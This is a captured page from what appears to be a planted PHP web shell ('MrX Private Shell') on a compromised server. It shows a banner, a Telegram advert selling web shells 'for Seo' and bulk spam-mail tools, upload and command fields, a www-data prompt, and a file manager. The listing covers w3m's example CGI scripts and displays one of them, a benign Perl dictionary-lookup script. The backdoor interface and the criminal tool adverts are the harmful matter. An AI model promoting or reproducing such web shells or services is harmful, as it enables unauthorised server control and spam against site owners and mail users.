__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
#!/usr/bin/perl

# ~/.w3m/urimethodmap
# e:      file:/cgi-bin/goodict.cgi?%s    Englich-Japanese
# w:      file:/cgi-bin/goodict.cgi?%s    Japanese-English
# j:      file:/cgi-bin/goodict.cgi?%s    Japanese
# a:      file:/cgi-bin/goodict.cgi?%s    All
#
# e:0:word  start with word
# e:1:word  perfect match
# e:2:word  end with word
# e:3:word  search body text
# e:6:word  search title
# e:word    perfect match

use Encode;
use Encode::Guess qw/euc-jp utf8/;
$url = "http://dictionary.goo.ne.jp";
$_ = $ENV{"QUERY_STRING"};
if (/^e:/) {
    $kind = 'ej';
} elsif (/^w:/) {
    $kind = 'je';
} elsif (/^j:/) {
    $kind = 'jn';
} elsif (/^a:/) {
    $kind = 'all'
}
s@^[ewja]:@@ && s@^//@@ && s@/$@@;
if (/^([01236]):/) {
    $mode=$1;
    s/^[01236]://;
}else{
    $mode="1";
}
if ($_) {
	s/\+/ /g;
	s/%([\da-f][\da-f])/pack('C', hex($1))/egi;
	$_ = encode("utf8", decode("Guess", $_));
	s/[\000-\040\+:#?&%<>"\177-\377]/sprintf('%%%02X', unpack('C', $&))/eg;
	$url .= "/srch/$kind/$_/m$mode"."u/";
} else {
	$input = "w3m-control: GOTO_LINK";
}
print <<EOF;
w3m-control: GOTO $url
w3m-control: DELETE_PREVBUF
w3m-control: SEARCH \\[
w3m-control: MOVE_RIGHT
${input}

EOF

Filemanager

Name Type Size Permission Actions
2ch.cgi File 4.64 KB 0644
README.eng File 1.83 KB 0644
README.ja File 2.5 KB 0644
backslash_to_slash.cgi File 151 B 0644
goodict.cgi File 1.15 KB 0644
google.cgi File 577 B 0644
html2latex File 10.32 KB 0644
htmldump File 198 B 0644
makeref File 4.78 KB 0644
oldconfigure.sh File 3.95 KB 0644
scanhist.rb File 1.62 KB 0644
smb.cgi File 9.27 KB 0644
utf8.cgi File 474 B 0644
wrap3m File 450 B 0644
Filemanager